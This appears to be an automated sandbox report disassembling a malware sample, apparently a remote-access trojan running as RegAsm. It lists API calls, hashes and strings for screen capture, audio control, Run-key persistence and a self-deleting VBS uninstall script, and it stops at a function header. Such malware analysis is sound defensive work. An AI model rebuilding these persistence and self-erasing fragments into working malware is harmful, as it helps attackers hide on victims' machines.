                                                          • API String ID: 0-248832578
                                                          • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                          • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                          • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                          • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                          Function 00451F9B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID: lJD
                                                          • API String ID: 1084509184-3316369744
                                                          • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                          • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                                          • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                          • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                                          Function 00452036 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID: lJD
                                                          • API String ID: 1084509184-3316369744
                                                          • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                          • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                                          • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                          • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                                          Function 004488ED Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: GetLocaleInfoEx
                                                          • API String ID: 2299586839-2904428671
                                                          • Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                                          • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                                          • Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                                          • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                                          Function 00452313 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452367
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                                          • String ID:
                                                          • API String ID: 1663032902-0
                                                          • Opcode ID: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                          • Instruction ID: a0857f467e030380fa261c038abb83aeded24e37e53cd803257bf99bba5c3bcd
                                                          • Opcode Fuzzy Hash: 5e55e5787c0a8882e24d5b04e2b41f1e3a8b10b9440aec12057efb59017b927c
                                                          • Instruction Fuzzy Hash: 0121B632550206ABDB249E35DD41BBA73A8EF05316F1001BFFD01D6242EBBC9D59CB58
                                                          Function 00452543 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,004522E1,00000000,00000000,?), ref: 0045256F
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$InfoLocale_abort_free
                                                          • String ID:
                                                          • API String ID: 2692324296-0
                                                          • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                          • Instruction ID: deb82abe2421a0f23b1c286da40711a82d27d1439ce4f734d0a93897c1f260ce
                                                          • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                          • Instruction Fuzzy Hash: 3EF0993290011ABBDB245A20C916BBB3768EB01316F04046BEC05A3241FBB8FD05C698
                                                          Function 00448404 Relevance: 1.5, APIs: 1, Instructions: 34COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00445888: EnterCriticalSection.KERNEL32(-0006D41D,?,00442FDB,00000000,0046E928,0000000C,00442F96,?,?,?,00445B26,?,?,004482CA,00000001,00000364), ref: 00445897
                                                          • EnumSystemLocalesW.KERNEL32(004483BE,00000001,0046EAD0,0000000C), ref: 0044843C
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalEnterEnumLocalesSectionSystem
                                                          • String ID:
                                                          • API String ID: 1272433827-0
                                                          • Opcode ID: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                          • Instruction ID: 9543b0ab25bad403ee5e8d2735ec903229a0e0f586434e65d0c90a277242bfd4
                                                          • Opcode Fuzzy Hash: 804d43dbd68489efcf8f22bf06177096911cc4f1bd16e2c376f90d23019e8210
                                                          • Instruction Fuzzy Hash: 6FF0AF72A50204EFE700EF69D946B8D37E0FB04725F10856AF414DB2A2CBB889808F09
                                                          Function 00451F50 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • EnumSystemLocalesW.KERNEL32(00451EA7,00000001,?,?,?,00452712,lJD,?,?,?,?,?,00444A6C,?,?,?), ref: 00451F87
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID:
                                                          • API String ID: 1084509184-0
                                                          • Opcode ID: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                          • Instruction ID: 7090a925995da140c065d9916092b781359a33e81ca1c933e4536b6f4f09cf03
                                                          • Opcode Fuzzy Hash: 4d0c5cba832e86d7a557150270e3ca6bc4d6d332941df2bd00d727cb77582ebf
                                                          • Instruction Fuzzy Hash: A7F0203674020597CB04AF75C809B6A7F90EBC272AB06009AEE058B662C7799842C754
                                                          Function 00434B47 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(Function_00034B53,0043487A), ref: 00434B4C
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                          • Instruction ID: b2b6851a15331e9206a2225a79f218ff0d060d1473a4ca8ef9e7ab7021fb00da
                                                          • Opcode Fuzzy Hash: 94f820becb3d11eb86a2e9fe35426058ee7de7bf36e1f11b305b7456ad7b3320
                                                          • Instruction Fuzzy Hash:
                                                          Function 00418E76 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                                            • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                                          • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                                          • DeleteDC.GDI32(00000000), ref: 00418F2A
                                                          • DeleteDC.GDI32(00000000), ref: 00418F2D
                                                          • DeleteObject.GDI32(00000000), ref: 00418F30
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                                          • DeleteDC.GDI32(00000000), ref: 00418F62
                                                          • DeleteDC.GDI32(00000000), ref: 00418F65
                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                                          • GetCursorInfo.USER32(?), ref: 00418FA7
                                                          • GetIconInfo.USER32(?,?), ref: 00418FBD
                                                          • DeleteObject.GDI32(?), ref: 00418FEC
                                                          • DeleteObject.GDI32(?), ref: 00418FF9
                                                          • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                                          • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                                          • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                                          • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                                          • DeleteDC.GDI32(?), ref: 0041917C
                                                          • DeleteDC.GDI32(00000000), ref: 0041917F
                                                          • DeleteObject.GDI32(00000000), ref: 00419182
                                                          • GlobalFree.KERNEL32(?), ref: 0041918D
                                                          • DeleteObject.GDI32(00000000), ref: 00419241
                                                          • GlobalFree.KERNEL32(?), ref: 00419248
                                                          • DeleteDC.GDI32(?), ref: 00419258
                                                          • DeleteDC.GDI32(00000000), ref: 00419263
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                                          • String ID: DISPLAY
                                                          • API String ID: 4256916514-865373369
                                                          • Opcode ID: 86b0354fb495a99297697fe6ef04b294736cc3efcbebce0c6d492a8aa7b6887a
                                                          • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                                          • Opcode Fuzzy Hash: 86b0354fb495a99297697fe6ef04b294736cc3efcbebce0c6d492a8aa7b6887a
                                                          • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                                          Function 0040D420 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 282registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                            • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040D51D
                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D530
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040D549
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040D579
                                                            • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                            • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                            • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                            • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D7C4
                                                          • ExitProcess.KERNEL32 ref: 0040D7D0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                          • String ID: """, 0$")$0qF$0qF$8SG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                          • API String ID: 1861856835-332907002
                                                          • Opcode ID: d1e5175430559d744f3697ac5d4fa8fe9ed39947549674ebcac5be490dbfcb53
                                                          • Instruction ID: f0dedf37b1d13a6a68a2ae87fd6fc042f686ba0b246118386f774540a9e6bc24
                                                          • Opcode Fuzzy Hash: d1e5175430559d744f3697ac5d4fa8fe9ed39947549674ebcac5be490dbfcb53
                                                          • Instruction Fuzzy Hash: 2191A4716082005AC315FB62D8529AFB7A9AF91309F10443FB14AA71E3FF7C9D49C65E
                                                          Function 0040D096 Relevance: 42.3, APIs: 6, Strings: 18, Instructions: 260registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                            • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1A5
                                                          • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040D1B8
                                                          • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1E8
                                                          • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752F0,?,pth_unenc), ref: 0040D1F7
                                                            • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                                            • Part of subcall function 0040B8AC: UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                                            • Part of subcall function 0040B8AC: TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                                            • Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,6CC58300,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D412
                                                          • ExitProcess.KERNEL32 ref: 0040D419
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                          • String ID: ")$.vbs$8SG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$hpF$open$pth_unenc$wend$while fso.FileExists("
                                                          • API String ID: 3797177996-2557013105
                                                          • Opcode ID: 6f7c707475e127e0f0984543e97620b4272e3932a2f9fe4e694b6d7d0f6a37c1
                                                          • Instruction ID: d7bb7cf55c4450259501d0c3086a2d123ad94ece798773e978a9ab54bd012bbb
                                                          • Opcode Fuzzy Hash: 6f7c707475e127e0f0984543e97620b4272e3932a2f9fe4e694b6d7d0f6a37c1
                                                          • Instruction Fuzzy Hash: 9081B0716082005BC715FB62D8529AF77A8AFD1308F10483FB586A71E2EF7C9E49C65E
                                                          Function 00412475 Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 190synchronizationsleepfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 00412494
                                                          • ExitProcess.KERNEL32(00000000), ref: 004124A0
                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041251A
                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412529
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00412534
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041253B
                                                          • GetCurrentProcessId.KERNEL32 ref: 00412541
                                                          • PathFileExistsW.SHLWAPI(?), ref: 00412572
                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 004125D5
                                                          • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 004125EF
                                                          • lstrcatW.KERNEL32(?,.exe), ref: 00412601
                                                            • Part of subcall function 0041C3F1: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466468,00000000,00000000,0040D3F9,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C430
                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00412641
                                                          • Sleep.KERNEL32(000001F4), ref: 00412682
                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412697
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126A2
                                                          • CloseHandle.KERNEL32(00000000), ref: 004126A9
                                                          • GetCurrentProcessId.KERNEL32 ref: 004126AF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                          • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                          • API String ID: 2649220323-436679193
                                                          • Opcode ID: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                          • Instruction ID: 17e21f0bcac096b9b94ced5306d028ab2385f4d1d2402c2ee3c492442eb82615
                                                          • Opcode Fuzzy Hash: 908bf4a0c636080116a95eb017d82998fcf2f5d0d03184f54df3d938f2d2222d
                                                          • Instruction Fuzzy Hash: 4651B371A00315BBDB10ABA09C9AEFE336D9B04715F10406BF502E71D2EFBC8E85865D
                                                          Function 0041B047 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B13C
                                                          • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B150
                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660A4), ref: 0041B178
                                                          • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B18E
                                                          • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B1CF
                                                          • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B1E7
                                                          • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B1FC
                                                          • SetEvent.KERNEL32 ref: 0041B219
                                                          • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B22A
                                                          • CloseHandle.KERNEL32 ref: 0041B23A
                                                          • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B25C
                                                          • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B266
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                          • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                          • API String ID: 738084811-2094122233
                                                          • Opcode ID: 9446444cf830fc6be835005bb32dda33b6c94807cab4868e8ff28011ff8f99e5
                                                          • Instruction ID: fe650b41180b39ed17604f18bcb9a712e211fca36760164052b554565c231c06
                                                          • Opcode Fuzzy Hash: 9446444cf830fc6be835005bb32dda33b6c94807cab4868e8ff28011ff8f99e5
                                                          • Instruction Fuzzy Hash: 0351A3B12842056AD314B771DC96ABF379CDB84358F10043FB64A521E2EF788D48CA6E
                                                          Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
